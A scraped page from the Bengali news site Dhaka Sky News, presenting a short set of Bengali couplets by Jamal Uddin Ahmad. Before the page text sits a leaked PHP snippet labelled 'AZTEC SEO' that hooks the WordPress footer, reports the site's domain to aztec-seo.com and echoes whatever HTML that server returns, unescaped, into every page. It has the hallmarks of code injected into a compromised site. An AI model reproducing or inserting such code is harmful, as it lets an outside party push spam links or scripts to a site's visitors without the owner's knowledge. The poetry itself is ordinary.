/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); কাব্যোক্তি : গুচ্ছ-৫ | Dhaka Sky News

কাব্যোক্তি : গুচ্ছ-৪

আগের সংবাদ

কাব্যোক্তি : গুচ্ছ-৬

পরের সংবাদ

কাব্যোক্তি : গুচ্ছ-৫

জামাল উদ্দিন আহমাদ

ঢাকা স্কাই নিউজ প্রকাশিত: June 23, 2020 , 1:09 pm

 

ভাব সাগরের বিজ্ঞ নাবিক, জানি না সন্তরণ
গহীন জলে সদাই ডুবাই শোলার মতো মন।
*
স্বাধীন স্বাধীন বলে আর কাঁদিস নারে মন
স্বাধীন হওয়ার শর্ত আগে আত্মনিয়ন্ত্রণ।
*
ধেয়ানে মুহূর্তের প্রাপ্তি- পাবার নয়
হাজার বছর বিজ্ঞান সাধনায়।
*
করুণা সিন্ধু চাহি না বন্ধু
ভালোবাসা দিও এক বিন্দু।
*
নিঃসঙ্গতা বিষণ্ণ আনে
বিষাদে মানুষ জীবন্ত লাশ।

 

-জামাল উদ্দিন আহমাদ